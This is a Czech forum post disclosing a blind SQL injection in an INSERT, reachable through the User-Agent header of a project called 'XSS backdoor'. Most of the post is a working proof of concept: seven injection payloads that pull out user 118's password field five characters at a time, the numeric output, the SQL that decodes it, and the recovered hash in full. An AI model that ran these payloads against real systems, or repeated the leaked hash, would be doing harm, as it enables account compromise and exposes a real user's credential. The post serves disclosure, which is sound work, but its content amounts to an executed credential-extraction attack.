SQLi - soom.cz (Projekt XSS backdoor) | # |
| V xss backdooru je SQLi v user agentu, pri zobrazeni vypisu zombie. Jedna se o BLIND SQLi v INSERTu. Jde se o stejnou zranitelnost, ktera se nechazela v projektu GET2MAIL [link] a zaroven jiz v roce 2014 v Anonymity Checkeru [link]
Poc:
User agent:
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 1, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 5, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 10, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 15, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 20, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 25, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 30, 5)), 16, 10) * '1
Result:
435439560292
430372500326
430456452449
434617279540
219868837689
430321971302
55
To hex:
SELECT unhex(conv(435439560292, 10, 16));
SELECT unhex(conv(430372500326, 10, 16));
SELECT unhex(conv(430456452449, 10, 16));
SELECT unhex(conv(434617279540, 10, 16));
SELECT unhex(conv(219868837689, 10, 16));
SELECT unhex(conv(430321971302, 10, 16));
SELECT unhex(conv(55, 10, 16));
Result:
6562386664
6434333366
6439343561
6531356434
3331343739
6431303066
37
To ascii:
eb8fdd433fd945ae15d431479d100f7
Podrobnosti:
[link] (odpovědět) | Sinxteniyn | 193.171.202.* | 26.10.2017 12:58 |
|
|
|